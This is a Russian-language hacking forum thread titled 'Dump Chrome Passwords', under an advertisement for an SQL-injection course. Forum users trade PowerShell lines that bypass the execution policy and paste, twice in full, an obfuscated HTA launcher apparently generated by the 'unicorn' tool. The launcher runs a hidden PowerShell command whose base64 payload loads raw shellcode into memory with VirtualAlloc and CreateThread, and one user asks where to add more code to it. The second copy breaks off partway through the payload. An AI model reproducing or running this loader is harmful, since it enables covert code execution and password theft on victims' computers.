• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Dump Chrome Passwords

G

gravitywaves

OneDollar сказал(а):
x64 shell C:\Windows\syswow64\Windowspowershell\v1.0\powershell Set-ExecutionPolicy BYPASS
Нажмите, чтобы раскрыть...
OneDollar сказал(а):
[/B][/B] x32 shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell Set-ExecutionPolicy BYPASS
Нажмите, чтобы раскрыть...
А этот код куда вписывать? в powershell исполняемый файл?
Вот есть файл launcher.hta от unicorn'а, я насколько понял он криптован немного, в нём этот код вписать после "RdsbdhCowoygthnIJqa.run(" ?
Код: 
<script>
ZHKBzCTkRgQQjQc = "WS";
IuyHxSSJazrET = "crip";
SDbnOJaHpCcm = "t.Sh";
LiCPliQIlfi = "ell";
IldWtaJzxjXA = (ZHKBzCTkRgQQjQc + IuyHxSSJazrET + SDbnOJaHpCcm + LiCPliQIlfi);
RdsbdhCowoygthnIJqa=new ActiveXObject(IldWtaJzxjXA);
uzbZRTiTKrBOmddtJoxuLNRhYYI = "cm";
UgAZvMvAIxmZVdq = "d.e";
rxROKfRJfwXefqhUaj = "xe";
zIIAGljUTFWqMU = (uzbZRTiTKrBOmddtJoxuLNRhYYI + UgAZvMvAIxmZVdq + rxROKfRJfwXefqhUaj);
RdsbdhCowoygthnIJqa.run('%windir%\\System32\\' + zIIAGljUTFWqMU + ' /c powershell -w 1 -C "s\'\'v ul -;s\'\'v mA e\'\'c;s\'\'v YD ((g\'\'v ul).value.toString()+(g\'\'v mA).value.toString());powershell (g\'\'v YD).value.toString() (\'JABXAFUAUwAgAD0AIAAnACQAVwBVACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQATQBMACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAVwBVACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAEEAcgAgAD0AIAAwAHgAZABhACwAMAB4AGMAMgAsADAAeABiADgALAAwAHgANwA5ACwAMAB4ADYAYgAsADAAeAA0AGIALAAwAHgAMAAzACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGIALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBhACwAMAB4ADMAMQAsADAAeAA0ADMALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADMALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA5ADIALAAwAHgAOQA3ACwAMAB4AGEAOQAsADAAeABmADYALAAwAHgAOQA4ACwAMAB4ADgAMAAsADAAeABhAGMALAAwAHgAZgA5ACwAMAB4ADYAMAAsADAAeAA1ADEALAAwAHgAZAAxACwAMAB4ADcAMAAsADAAeAA4ADUALAAwAHgANgAwACwAMAB4AGQAMQAsADAAeABlADcALAAwAHgAYwBlACwAMAB4AGQAMwAsADAAeABlADEALAAwAHgANgBjACwAMAB4ADgAMgAsADAAeABkAGYALAAwAHgAOABhACwAMAB4ADIAMQAsADAAeAAzADYALAAwAHgANgBiACwAMAB4AGYAZQAsADAAeABlAGQALAAwAHgAMwA5ACwAMAB4AGQAYwAsADAAeABiADUALAAwAHgAYwBiACwAMAB4ADcANAAsADAAeABkAGQALAAwAHgAZQA2ACwAMAB4ADIAOAAsADAAeAAxADcALAAwAHgANQBkACwAMAB4AGYANQAsADAAeAA3AGMALAAwAHgAZgA3ACwAMAB4ADUAYwAsADAAeAAzADYALAAwAHgANwAxACwAMAB4AGYANgAsADAAeAA5ADkALAAwAHgAMgBiACwAMAB4ADcAOAAsADAAeABhAGEALAAwAHgANwAyACwAMAB4ADIANwAsADAAeAAyAGYALAAwAHgANQBhACwAMAB4AGYANgAsADAAeAA3AGQALAAwAHgAZQBjACwAMAB4AGQAMQAsADAAeAA0ADQALAAwAHgAOQAzACwAMAB4ADcANAAsADAAeAAwADYALAAwAHgAMQBjACwAMAB4ADkAMgAsADAAeAA1ADUALAAwAHgAOQA5ACwAMAB4ADEANgAsADAAeABjAGQALAAwAHgANwA1ACwAMAB4ADEAOAAsADAAeABmAGEALAAwAHgANgA1ACwAMAB4ADMAYwAsADAAeAAwADIALAAwAHgAMQBmACwAMAB4ADQAMwAsADAAeABmADYALAAwAHgAYgA5ACwAMAB4AGUAYgAsADAAeAAzAGYALAAwAHgAMAA5ACwAMAB4ADYAYgAsADAAeAAyADIALAAwAHgAYgBmACwAMAB4AGEANgAsADAAeAA1ADIALAAwAHgAOABhACwAMAB4ADMAMgAsADAAeABiADYALAAwAHgAOQAzACwAMAB4ADIAZAAsADAAeABhAGQALAAwAHgAYwBkACwAMAB4AGUAZAAsADAAeAA0AGQALAAwAHgANQAwACwAMAB4AGQANgAsADAAeAAyAGEALAAwAHgAMgBmACwAMAB4ADgAZQAsADAAeAA1ADMALAAwAHgAYQA4ACwAMAB4ADkANwAsADAAeAA0ADUALAAwAHgAYwAzACwAMAB4ADEANAAsADAAeAAyADkALAAwAHgAOAA5ACwAMAB4ADkAMgAsADAAeABkAGYALAAwAHgAMgA1ACwAMAB4ADYANgAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4ADIAOQAsADAAeAA3ADkALAAwAHgAMwA1ACwAMAB4AGIAYwAsADAAeAA1ADYALAAwAHgAZgAyACwAMAB4AGIAOAAsADAAeAAxADIALAAwAHgAZABmACwAMAB4ADQAMAAsADAAeAA5AGYALAAwAHgAYgA2ACwAMAB4AGIAYgAsADAAeAAxADMALAAwAHgAYgBlACwAMAB4AGUAZgAsADAAeAA2ADEALAAwAHgAZgA1ACwAMAB4AGIAZgAsADAAeABlAGYALAAwAHgAYwA5ACwAMAB4AGEAYQAsADAAeAA2ADUALAAwAHgANgA0ACwAMAB4AGUANwAsADAAeABiAGYALAAwAHgAMQA3ACwAMAB4ADIANwAsADAAeAA2ADAALAAwAHgAMgBlACwAMAB4ADQAZAAsADAAeABhADMALAAwAHgANwAwACwAMAB4AGMANgAsADAAeABmAGEALAAwAHgAMgAyACwAMAB4ADEAZgAsADAAeAA3AGYALAAwAHgANQAxACwAMAB4AGQAYwAsADAAeAA5ADMALAAwAHgAMAA4ACwAMAB4ADcAZgAsADAAeAAxAGIALAAwAHgAZAAzACwAMAB4ADIAMgAsADAAeAA0AGUALAAwAHgAZgA4ACwAMAB4ADcAOAAsADAAeAA5AGUALAAwAHgAZQAyACwAMAB4AGEAZAAsADAAeAAyAGQALAAwAHgANAA4ACwAMAB4ADMAZgAsADAAeAAwADcALAAwAHgAYQBiACwAMAB4ADIAZgAsADAAeABjADAALAAwAHgANwAyACwAMAB4ADEAOAAsADAAeAA2ADMALAAwAHgANQA1ACwAMAB4ADcAZgAsADAAeABjAGMALAAwAHgAZAAwACwAMAB4AGMAMQAsADAAeABjADQALAAwAHgAZgAzACwAMAB4AGQANgAsADAAeAAxADEALAAwAHgAZAAyACwAMAB4ADYAYwAsADAAeABkADYALAAwAHgAMQAxACwAMAB4ADIAMgAsADAAeABhADIALAAwAHgAZQA2ACwAMAB4ADcAOQAsADAAeAAxAGIALAAwAHgAOAA0ACwAMAB4ADUAYQAsADAAeAA3AGEALAAwAHgAMABiACwAMAB4ADkAYwAsADAAeAAwAGQALAAwAHgAZgAzACwAMAB4ADMANAAsADAAeAA5AGEALAAwAHgANABkACwAMAB4AGQANgAsADAAeABjADMALAAwAHgAZQA1ACwAMAB4AGUAMQAsADAAeABiADEALAAwAHgAZAAzACwAMAB4AGQAYgAsADAAeABlADUALAAwAHgAYwA2ACwAMAB4ADgAMAAsADAAeAA\'+\'0ADgALAAwAHgAYgA1ACwAMAB4ADkAMQAsADAAeAA3ADUALAAwAHgAMwA5ACwAMAB4ADUAMQAsADAAeABmADUALAAwAHgAMgBjACwAMAB4AGUAYgAsADAAeAA5AGEALAAwAHgAZgA2ACwAMAB4ADEAYgAsADAAeAA2ADUALAAwAHgAYgA2ACwAMAB4ADAAMgAsADAAeABmAGMALAAwAHgAZQAyACwAMAB4AGMANwAsADAAeAAyADAALAAwAHgAMAAyACwAMAB4AGYAMwAsADAAeAA0AGUALAAwAHgAYQA2ACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMAAwACwAMAB4ADQAZAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAYwBkACwAMAB4AGQAMwAsADAAeAA4AGYALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeABiADgALAAwAHgAZABjACwAMAB4ADUANQAsADAAeABmADUALAAwAHgANgA5ACwAMAB4ADgAYgAsADAAeAA3ADQALAAwAHgAZgBmACwAMAB4ADgAZAAsADAAeAAzADAALAAwAHgANwA4ACwAMAB4ADIAYQAsADAAeAAyADgALAAwAHgAMAA2ACwAMAB4AGYAMwAsADAAeABjADIALAAwAHgANQBiACwAMAB4ADAAZgAsADAAeABlAGYALAAwAHgAZQBhACwAMAB4ADkAYgAsADAAeAA2ADcALAAwAHgANQA0ACwAMAB4ADEAYQAsADAAeABhAGUALAAwAHgAOQA3ACwAMAB4AGEAYgAsADAAeAAwAGYALAAwAHgAOQBlACwAMAB4ADIAMgAsADAAeAA5ADkALAAwAHgAYwA3ACwAMAB4AGQAMQAsADAAeAA3ADgALAAwAHgAOAAzACwAMAB4ADQAMQAsADAAeABlAGQALAAwAHgANQA2ACwAMAB4AGEAZQAsADAAeAAyAGQALAAwAHgANwA5ACwAMAB4ADUAOQAsADAAeAAzAGYALAAwAHgAYQBkACwAMAB4ADcAOQAsADAAeAAzADEALAAwAHgAMwBmACwAMAB4AGEAZAAsADAAeAAzADkALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeABjADUALAAwAHgAZQAxACwAMAB4ADYANQAsADAAeABjADEALAAwAHgAZgAwACwAMAB4AGUAZAAsADAAeABiADMALAAwAHgANwA1ACwAMAB4AGEAOQAsADAAeAA0ADIALAAwAHgAYgA1ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgAMABkACwAMAB4AGMANQAsADAAeAA0ADEALAAwAHgAYQA0ACwAMAB4AGMAZAAsADAAeAA5ADYALAAwAHgAZAA3ACwAMAB4AGMAYwAsADAAeABkAGYALAAwAHgAOABlACwAMAB4ADUAMQAsADAAeABlAGUALAAwAHgAMQBmACwAMAB4ADcAYgAsADAAeABlADQALAAwAHgAMgBlACwAMAB4AGEAYgAsADAAeAA0ADkALAAwAHgANgBjACwAMAB4AGEAOQAsADAAeAA1ADUALAAwAHgAOQAxACwAMAB4AGYANgAsADAAeAA3ADUALAAwAHgAMgAwACwAMAB4AGYAMAAsADAAeABhADEALAAwAHgAYgA2ACwAMAB4ADkANAAsADAAeAAxADIALAAwAHgAMwA4ACwAMAB4AGMANwAsADAAeABkADQALAAwAHgAMQBjACwAMAB4ADgAYQAsADAAeAAwAGUALAAwAHgAMQA5ACwAMAB4AGMAZAAsADAAeABkAGMALAAwAHgANAA2ACwAMAB4ADYANQAsADAAeAAzAGYALAAwAHgAMgBlACwAMAB4ADgAOAAsADAAeABhADEALAAwAHgAMABiACwAMAB4ADUAMAA7ACQAVgBnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAEEAcgAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABWAGcAIAA9ACAAJABBAHIALgBMAGUAbgBnAHQAaAB9ADsAJABTAHEAPQAkAE0ATAA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAFYAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAEYAcQA9ADAAOwAkAEYAcQAgAC0AbABlACAAKAAkAEEAcgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABGAHEAKwArACkAIAB7ACQATQBMADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBxAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEYAcQApACwAIAAkAEEAcgBbACQARgBxAF0ALAAgADEAKQB9ADsAJABNAEwAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAcQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAVgBnAEgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVwBVAFMAKQApADsAJABkAHgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBpACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEEAaQAgACQAZAB4ACAAJABWAGcASAAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABkAHgAIAAkAFYAZwBIACIAOwB9AA\'+\'==\')"', 0);window.close();
</script>
[/B]
 
O

OneDollar

gravitywaves сказал(а):
А этот код куда вписывать? в powershell исполняемый файл?
Вот есть файл launcher.hta от unicorn'а, я насколько понял он криптован немного, в нём этот код вписать после "RdsbdhCowoygthnIJqa.run(" ?
Код: 
<script>
ZHKBzCTkRgQQjQc = "WS";
IuyHxSSJazrET = "crip";
SDbnOJaHpCcm = "t.Sh";
LiCPliQIlfi = "ell";
IldWtaJzxjXA = (ZHKBzCTkRgQQjQc + IuyHxSSJazrET + SDbnOJaHpCcm + LiCPliQIlfi);
RdsbdhCowoygthnIJqa=new ActiveXObject(IldWtaJzxjXA);
uzbZRTiTKrBOmddtJoxuLNRhYYI = "cm";
UgAZvMvAIxmZVdq = "d.e";
rxROKfRJfwXefqhUaj = "xe";
zIIAGljUTFWqMU = (uzbZRTiTKrBOmddtJoxuLNRhYYI + UgAZvMvAIxmZVdq + rxROKfRJfwXefqhUaj);
RdsbdhCowoygthnIJqa.run('%windir%\\System32\\' + zIIAGljUTFWqMU + ' /c powershell -w 1 -C "s\'\'v ul -;s\'\'v mA e\'\'c;s\'\'v YD ((g\'\'v ul).value.toString()+(g\'\'v mA).value.toString());powershell (g\'\'v YD).value.toString() (\'JABXAFUAUwAgAD0AIAAnACQAVwBVACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQATQBMACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAVwBVACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAEEAcgAgAD0AIAAwAHgAZABhACwAMAB4AGMAMgAsADAAeABiADgALAAwAHgANwA5ACwAMAB4ADYAYgAsADAAeAA0AGIALAAwAHgAMAAzACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGIALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBhACwAMAB4ADMAMQAsADAAeAA0ADMALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA0ADMALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA5ADIALAAwAHgAOQA3ACwAMAB4AGEAOQAsADAAeABmADYALAAwAHgAOQA4ACwAMAB4ADgAMAAsADAAeABhAGMALAAwAHgAZgA5ACwAMAB4ADYAMAAsADAAeAA1ADEALAAwAHgAZAAxACwAMAB4ADcAMAAsADAAeAA4ADUALAAwAHgANgAwACwAMAB4AGQAMQAsADAAeABlADcALAAwAHgAYwBlACwAMAB4AGQAMwAsADAAeABlADEALAAwAHgANgBjACwAMAB4ADgAMgAsADAAeABkAGYALAAwAHgAOABhACwAMAB4ADIAMQAsADAAeAAzADYALAAwAHgANgBiACwAMAB4AGYAZQAsADAAeABlAGQALAAwAHgAMwA5ACwAMAB4AGQAYwAsADAAeABiADUALAAwAHgAYwBiACwAMAB4ADcANAAsADAAeABkAGQALAAwAHgAZQA2ACwAMAB4ADIAOAAsADAAeAAxADcALAAwAHgANQBkACwAMAB4AGYANQAsADAAeAA3AGMALAAwAHgAZgA3ACwAMAB4ADUAYwAsADAAeAAzADYALAAwAHgANwAxACwAMAB4AGYANgAsADAAeAA5ADkALAAwAHgAMgBiACwAMAB4ADcAOAAsADAAeABhAGEALAAwAHgANwAyACwAMAB4ADIANwAsADAAeAAyAGYALAAwAHgANQBhACwAMAB4AGYANgAsADAAeAA3AGQALAAwAHgAZQBjACwAMAB4AGQAMQAsADAAeAA0ADQALAAwAHgAOQAzACwAMAB4ADcANAAsADAAeAAwADYALAAwAHgAMQBjACwAMAB4ADkAMgAsADAAeAA1ADUALAAwAHgAOQA5ACwAMAB4ADEANgAsADAAeABjAGQALAAwAHgANwA1ACwAMAB4ADEAOAAsADAAeABmAGEALAAwAHgANgA1ACwAMAB4ADMAYwAsADAAeAAwADIALAAwAHgAMQBmACwAMAB4ADQAMwAsADAAeABmADYALAAwAHgAYgA5ACwAMAB4AGUAYgAsADAAeAAzAGYALAAwAHgAMAA5ACwAMAB4ADYAYgAsADAAeAAyADIALAAwAHgAYgBmACwAMAB4AGEANgAsADAAeAA1ADIALAAwAHgAOABhACwAMAB4ADMAMgAsADAAeABiADYALAAwAHgAOQAzACwAMAB4ADIAZAAsADAAeABhAGQALAAwAHgAYwBkACwAMAB4AGUAZAAsADAAeAA0AGQALAAwAHgANQAwACwAMAB4AGQANgAsADAAeAAyAGEALAAwAHgAMgBmACwAMAB4ADgAZQAsADAAeAA1ADMALAAwAHgAYQA4ACwAMAB4ADkANwAsADAAeAA0ADUALAAwAHgAYwAzACwAMAB4ADEANAAsADAAeAAyADkALAAwAHgAOAA5ACwAMAB4ADkAMgAsADAAeABkAGYALAAwAHgAMgA1ACwAMAB4ADYANgAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4ADIAOQAsADAAeAA3ADkALAAwAHgAMwA1ACwAMAB4AGIAYwAsADAAeAA1ADYALAAwAHgAZgAyACwAMAB4AGIAOAAsADAAeAAxADIALAAwAHgAZABmACwAMAB4ADQAMAAsADAAeAA5AGYALAAwAHgAYgA2ACwAMAB4AGIAYgAsADAAeAAxADMALAAwAHgAYgBlACwAMAB4AGUAZgAsADAAeAA2ADEALAAwAHgAZgA1ACwAMAB4AGIAZgAsADAAeABlAGYALAAwAHgAYwA5ACwAMAB4AGEAYQAsADAAeAA2ADUALAAwAHgANgA0ACwAMAB4AGUANwAsADAAeABiAGYALAAwAHgAMQA3ACwAMAB4ADIANwAsADAAeAA2ADAALAAwAHgAMgBlACwAMAB4ADQAZAAsADAAeABhADMALAAwAHgANwAwACwAMAB4AGMANgAsADAAeABmAGEALAAwAHgAMgAyACwAMAB4ADEAZgAsADAAeAA3AGYALAAwAHgANQAxACwAMAB4AGQAYwAsADAAeAA5ADMALAAwAHgAMAA4ACwAMAB4ADcAZgAsADAAeAAxAGIALAAwAHgAZAAzACwAMAB4ADIAMgAsADAAeAA0AGUALAAwAHgAZgA4ACwAMAB4ADcAOAAsADAAeAA5AGUALAAwAHgAZQAyACwAMAB4AGEAZAAsADAAeAAyAGQALAAwAHgANAA4ACwAMAB4ADMAZgAsADAAeAAwADcALAAwAHgAYQBiACwAMAB4ADIAZgAsADAAeABjADAALAAwAHgANwAyACwAMAB4ADEAOAAsADAAeAA2ADMALAAwAHgANQA1ACwAMAB4ADcAZgAsADAAeABjAGMALAAwAHgAZAAwACwAMAB4AGMAMQAsADAAeABjADQALAAwAHgAZgAzACwAMAB4AGQANgAsADAAeAAxADEALAAwAHgAZAAyACwAMAB4ADYAYwAsADAAeABkADYALAAwAHgAMQAxACwAMAB4ADIAMgAsADAAeABhADIALAAwAHgAZQA2ACwAMAB4ADcAOQAsADAAeAAxAGIALAAwAHgAOAA0ACwAMAB4ADUAYQAsADAAeAA3AGEALAAwAHgAMABiACwAMAB4ADkAYwAsADAAeAAwAGQALAAwAHgAZgAzACwAMAB4ADMANAAsADAAeAA5AGEALAAwAHgANABkACwAMAB4AGQANgAsADAAeABjADMALAAwAHgAZQA1ACwAMAB4AGUAMQAsADAAeABiADEALAAwAHgAZAAzACwAMAB4AGQAYgAsADAAeABlADUALAAwAHgAYwA2ACwAMAB4ADgAMAAsADAAeAA\'+\'0ADgALAAwAHgAYgA1ACwAMAB4ADkAMQAsADAAeAA3ADUALAAwAHgAMwA5ACwAMAB4ADUAMQAsADAAeABmADUALAAwAHgAMgBjACwAMAB4AGUAYgAsADAAeAA5AGEALAAwAHgAZgA2ACwAMAB4ADEAYgAsADAAeAA2ADUALAAwAHgAYgA2ACwAMAB4ADAAMgAsADAAeABmAGMALAAwAHgAZQAyACwAMAB4AGMANwAsADAAeAAyADAALAAwAHgAMAAyACwAMAB4AGYAMwAsADAAeAA0AGUALAAwAHgAYQA2ACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMAAwACwAMAB4ADQAZAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAYwBkACwAMAB4AGQAMwAsADAAeAA4AGYALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeABiADgALAAwAHgAZABjACwAMAB4ADUANQAsADAAeABmADUALAAwAHgANgA5ACwAMAB4ADgAYgAsADAAeAA3ADQALAAwAHgAZgBmACwAMAB4ADgAZAAsADAAeAAzADAALAAwAHgANwA4ACwAMAB4ADIAYQAsADAAeAAyADgALAAwAHgAMAA2ACwAMAB4AGYAMwAsADAAeABjADIALAAwAHgANQBiACwAMAB4ADAAZgAsADAAeABlAGYALAAwAHgAZQBhACwAMAB4ADkAYgAsADAAeAA2ADcALAAwAHgANQA0ACwAMAB4ADEAYQAsADAAeABhAGUALAAwAHgAOQA3ACwAMAB4AGEAYgAsADAAeAAwAGYALAAwAHgAOQBlACwAMAB4ADIAMgAsADAAeAA5ADkALAAwAHgAYwA3ACwAMAB4AGQAMQAsADAAeAA3ADgALAAwAHgAOAAzACwAMAB4ADQAMQAsADAAeABlAGQALAAwAHgANQA2ACwAMAB4AGEAZQAsADAAeAAyAGQALAAwAHgANwA5ACwAMAB4ADUAOQAsADAAeAAzAGYALAAwAHgAYQBkACwAMAB4ADcAOQAsADAAeAAzADEALAAwAHgAMwBmACwAMAB4AGEAZAAsADAAeAAzADkALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeABjADUALAAwAHgAZQAxACwAMAB4ADYANQAsADAAeABjADEALAAwAHgAZgAwACwAMAB4AGUAZAAsADAAeABiADMALAAwAHgANwA1ACwAMAB4AGEAOQAsADAAeAA0ADIALAAwAHgAYgA1ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgAMABkACwAMAB4AGMANQAsADAAeAA0ADEALAAwAHgAYQA0ACwAMAB4AGMAZAAsADAAeAA5ADYALAAwAHgAZAA3ACwAMAB4AGMAYwAsADAAeABkAGYALAAwAHgAOABlACwAMAB4ADUAMQAsADAAeABlAGUALAAwAHgAMQBmACwAMAB4ADcAYgAsADAAeABlADQALAAwAHgAMgBlACwAMAB4AGEAYgAsADAAeAA0ADkALAAwAHgANgBjACwAMAB4AGEAOQAsADAAeAA1ADUALAAwAHgAOQAxACwAMAB4AGYANgAsADAAeAA3ADUALAAwAHgAMgAwACwAMAB4AGYAMAAsADAAeABhADEALAAwAHgAYgA2ACwAMAB4ADkANAAsADAAeAAxADIALAAwAHgAMwA4ACwAMAB4AGMANwAsADAAeABkADQALAAwAHgAMQBjACwAMAB4ADgAYQAsADAAeAAwAGUALAAwAHgAMQA5ACwAMAB4AGMAZAAsADAAeABkAGMALAAwAHgANAA2ACwAMAB4ADYANQAsADAAeAAzAGYALAAwAHgAMgBlACwAMAB4ADgAOAAsADAAeABhADEALAAwAHgAMABiACwAMAB4ADUAMAA7ACQAVgBnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAEEAcgAuAEwA